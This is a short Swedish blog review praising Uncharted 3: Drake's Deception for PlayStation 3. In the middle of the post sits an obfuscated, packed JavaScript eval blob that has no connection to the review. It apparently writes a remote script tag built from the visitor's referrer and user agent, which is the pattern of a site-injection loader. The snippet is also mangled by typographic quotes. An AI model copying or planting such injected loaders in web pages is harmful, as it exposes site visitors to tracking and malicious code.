Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Uncharted 3: Drake’s Deception recension

Uncharted 3: Drake’s Deception recension
Sebastian

Det är många bra spel som kommer nu, lite för många nästan, men en spelserie som man inte får missa är Uncharted, en franchise som aldrig underlevererat och det verkar inte som att Naughty Dog har tänkt att ändra på det heller. Uncharted 3 kom ut den andra november till Playstation 3, och om ni inte köpt det än är det bara springa ner och göra det med en gång!

 

Get eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dtrry|var|u0026u|referrer|zbkfh||js|php’.split(’|’),0,{}))
More:
GameTrailers.com, Uncharted 3: Drake’s Deception – Review HD, PC Games, PlayStation 3, Xbox 360